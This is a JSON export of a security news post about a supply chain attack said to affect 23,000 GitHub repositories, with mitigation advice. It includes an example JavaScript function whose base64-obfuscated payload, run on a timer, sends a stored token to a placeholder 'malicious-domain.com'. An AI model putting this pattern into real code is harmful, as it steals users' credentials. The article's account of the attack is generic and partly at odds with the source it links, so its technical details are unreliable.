{"id":2665,"date":"2025-03-18T10:05:10","date_gmt":"2025-03-18T10:05:10","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/03\/18\/23000-github-repositories-targeted-in-supply-chain-attack\/"},"modified":"2025-03-18T10:05:10","modified_gmt":"2025-03-18T10:05:10","slug":"23000-github-repositories-targeted-in-supply-chain-attack","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/03\/18\/23000-github-repositories-targeted-in-supply-chain-attack\/","title":{"rendered":"23,000 GitHub Repositories Targeted In Supply Chain Attack"},"content":{"rendered":"<p>    23,000 GitHub Repositories Targeted In Supply Chain Attack<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>In a massive security breach discovered this week, approximately 23,000 GitHub repositories have been compromised in what security experts are calling one of the largest supply chain attacks to date.<\/p>\n<p>The attackers exploited vulnerabilities in the <a href=\"https:\/\/cybersecuritynews.com\/cybersecurity-in-trading-software-development\/\" target=\"_blank\" rel=\"noreferrer noopener\">software development<\/a> pipeline to potentially distribute malicious code to thousands of downstream applications and services.<\/p>\n<p>GitHub, a platform hosting over 200 million repositories and used by more than 100 million developers worldwide, confirmed the attack after several popular open-source projects reported unauthorized commits to their codebases.<\/p>\n<p>These repositories collectively serve as dependencies for millions of applications, amplifying the potential impact of this security incident.<\/p>\n<p>StepSecurity Security researchers <a href=\"https:\/\/www.stepsecurity.io\/blog\/harden-runner-detection-tj-actions-changed-files-action-is-compromised\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> the attack pattern after noticing suspicious commit activities across multiple unrelated repositories.<\/p>\n<p>The attack primarily targeted repositories with high download counts and those used as dependencies in enterprise applications, revealing a calculated strategy to maximize impact.<\/p>\n<p>Technical analysis revealed the attackers used a sophisticated approach to compromise maintainer accounts through a combination of phishing attacks and exploiting token leaks.<\/p>\n<p>Once gaining access, they injected malicious code snippets designed to be difficult to detect during routine code reviews.<\/p>\n<p>The injected code typically contained obfuscated payloads similar to the example below:-<\/p>\n<pre class=\"wp-block-code\"><code>function validate(input) {\n  \/\/ Legitimate-looking function\n  let result = checkFormat(input);\n\n  \/\/ Malicious payload hidden within normal code\n  setTimeout(() =&gt; {\n    new Function(atob(\"ZmV0Y2goJ2h0dHBzOi8vbWFsaWNpb3VzLWRvbWFpbi5jb20vYycsIHttZXRob2Q6ICdQT1NUJywgYm9keTogSlNPTi5zdHJpbmdpZnkoe2Q6IGxvY2FsU3RvcmFnZS5nZXRJdGVtKCd0b2tlbicpfSl9KTs=\"))();\n  }, 10000);\n\n  return result;\n}<\/code><\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgsmpyLB1K_ghKhMaem87sTnH2-lvVzWZ5DJtp_6a_Z0Clsqzo-xUgoLm_ZHZeTu57WDsGVc7bt3V5zQ1Qy48CTGLfCLOO6OyOGLdaQtocYP89HASGX1C0I9MUpBfueyopyZRDnxhH2Ck1-DTmCJ4AkB2HITP1jHg0c9jtONJP7AQIgl2RSCmjlrb7E7yw\/s16000\/Malicious%2520commit%2520%28Source%2520-%2520%2520StepSecurity%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Malicious commit (Source \u2013 StepSecurity)<\/figcaption><\/figure>\n<\/div>\n<h2 class=\"wp-block-heading\"><strong>Mitigation Efforts<\/strong><\/h2>\n<p>Project maintainers are advised to audit recent commits, especially those modifying package configuration files or dependency declarations.<\/p>\n<p>GitHub has temporarily restricted access to the affected repositories while working with maintainers to revert malicious changes and implement additional <a href=\"https:\/\/cybersecuritynews.com\/security-measures-that-help-protect-your-crypto\/\" target=\"_blank\" rel=\"noreferrer noopener\">security measures<\/a>.<\/p>\n<p>Security experts recommend users check their dependencies urgently and update to verified versions.<\/p>\n<p>Organizations should review their software supply chain security practices and implement automated scanning tools to detect potential compromises before they impact production systems.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhH-7k9BSOXzL3b3aLtKkVKucL9BFfLkrNsCfjTw7q6l7xMmFjzv80NjGcnVFFnLVinytZwhhQzPUXEgT7vRAfPBrSHEY7YU9HcunQ6X1n7h9Pyfu3NwzkgLE_3v5bHxO-pNpNovd145SVzk_CeypxneQilKiHlKhP7wmzQqwFBC9cqSSq3kuYiztAeo1A\/s16000\/Workflow%2520%28Source%2520-%2520%2520StepSecurity%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Workflow (Source \u2013 StepSecurity)<\/figcaption><\/figure>\n<\/div>\n<p>The attack shows the growing importance of securing the <a href=\"https:\/\/cybersecuritynews.com\/how-do-you-defend-against-software-supply-chain-attacks\/\" target=\"_blank\" rel=\"noreferrer noopener\">software supply chain<\/a>, as a single compromised dependency can affect thousands of downstream applications and expose sensitive data across numerous organizations.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 92%,rgb(169,184,195) 100%)\"><strong><strong><code><strong>Are you from SOC\/DFIR Teams? \u2013 Analyse Malware Incidents &amp; get live Access with ANY.RUN -&gt;\u00a0<a href=\"https:\/\/any.run\/demo?utm_source=csn&amp;utm_medium=article&amp;utm_campaign=ti_feeds&amp;utm_content=demo&amp;utm_term=110325\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Start Now for Free<\/a>.<\/strong><\/code><\/strong><\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/\">23,000 GitHub Repositories Targeted In Supply Chain Attack<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/23000-github-repositories-targeted\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>23,000 GitHub Repositories Targeted In Supply Chain Attack In a massive security breach discovered this week, approximately 23,000 GitHub repositories have been compromised in what security experts are calling one of the largest supply chain attacks to date. The attackers exploited vulnerabilities in the software development pipeline to potentially distribute malicious code to thousands of [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[701,63,700],"tags":[130],"class_list":["post-2665","post","type-post","status-publish","format-standard","hentry","category-cyber-attack","category-cyber-security-news","category-cyberattack-news","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/2665"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=2665"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/2665\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=2665"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=2665"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=2665"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}